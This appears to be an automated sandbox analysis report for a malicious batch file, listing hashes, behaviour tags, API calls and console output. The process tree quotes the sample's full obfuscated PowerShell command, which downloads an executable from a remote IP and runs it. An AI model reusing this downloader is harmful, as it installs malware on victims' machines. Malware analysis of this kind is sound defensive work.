popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

cmpbksrvc32.cmd

Generic Malware Malicious Library Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection Sniff Audio Steal credential AntiDebug PE File AntiVM PE32 PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Jan. 27, 2023, 9:26 a.m. Jan. 27, 2023, 9:33 a.m.
Size 45.3KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 bc352f34af0f8ee2c8296dd6aa86b7e7
SHA256 7af42e6fa7955f7bf85eb95443fae9343963f2c1f4a9ae106ab77fe6bb74a4e2
CRC32 A3CBCBA0
ssdeep 768:dfX3Zb0v0cSbvTDW5p8DPK11Nw7ZzDI+xsy1MEOZcq7Gqzo4WomBBuxIDzJvTIKd:VOvtS+p8DPM87LxskMEO+0E0Ykxq
Yara
  • Antivirus - Contains references to security software

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iHjkEoTtwJ" C:\Users\test22\AppData\Local\Temp\cmpbksrvc32.cmd

    2544

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\cmpbksrvc32.cmd

      2616

      • powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex BYPAsS -noNI -W HiddEn $EFGiZIWe = [NET.WebrEQuest]::CreaTe( ([chAR] 104 + [chAR] 116 + [cHAr] 116 + [ChAr] 112 + [chAR] 58 + [cHar] 47 + [cHaR] 47 + [CHAr] 53 + [CHAr] 46 + [chAr] 55 + [CHAr] 53 + [ChaR] 46 + [CHAr] 50 + [cHAR] 52 + [cHaR] 56 + [CHaR] 46 + [CHar] 50 + [chaR] 48 + [chAr] 55 + [Char] 47 + [CHar] 97 + [cHaR] 118 + [CHAR] 105 + [CHaR] 99 + [CHar] 97 + [cHAr] 112 + [char] 110 + [ChaR] 51 + [cHAr] 50 + [char] 46 + [chAr] 101 + [ChAr] 120 + [Char] 101 ) ).GEtResPOnSE( ).COntenTleNgth ; ( New-OBJeCt ( [char] 78 + [chAr] 101 + [CHAr] 116 + [cHAR] 46 + [cHAr] 87 + [ChAR] 69 + [ChAR] 66 + [char] 67 + [cHAr] 108 + [chaR] 73 + [ChAr] 101 + [chaR] 110 + [chAR] 116 )).( [chaR] 100 + [chAR] 111 + [ChAR] 119 + [Char] 110 + [cHaR] 108 + [ChaR] 111 + [CHAR] 97 + [Char] 68 + [CHAr] 70 + [cHAR] 105 + [CHar] 76 + [ChAR] 101 + [cHaR] 97 + [cHar] 115 + [ChaR] 121 + [ChAR] 110 + [cHAR] 99 ).inVOKE( ([chAR] 104 + [cHAr] 116 + [ChAr] 116 + [chAR] 112 + [cHar] 58 + [cHaR] 47 + [CHAr] 47 + [CHAr] 53 + [chAr] 46 + [CHAr] 55 + [ChaR] 53 + [CHAr] 46 + [cHAR] 50 + [cHaR] 52 + [CHaR] 56 + [CHar] 46 + [chaR] 50 + [chAr] 48 + [Char] 55 + [CHar] 47 + [cHaR] 97 + [CHAR] 118 + [CHaR] 105 + [CHar] 99 + [cHAr] 97 + [char] 112 + [ChaR] 110 + [cHAr] 51 + [char] 50 + [chAr] 46 + [ChAr] 101 + [Char] 120 + [CHar] 101 ) , 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) ; If ( TesT-PATh 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) { dO { $BGyLZQxsIspBheUMTlPoHVXx = ([Io.FIlEINfo] 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ).lEnGth } UnTIL ( $BGyLZQxsIspBheUMTlPoHVXx -EQ $EFGiZIWe )} ; "&" 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe'

        2704

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
5.75.248.207 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 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
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 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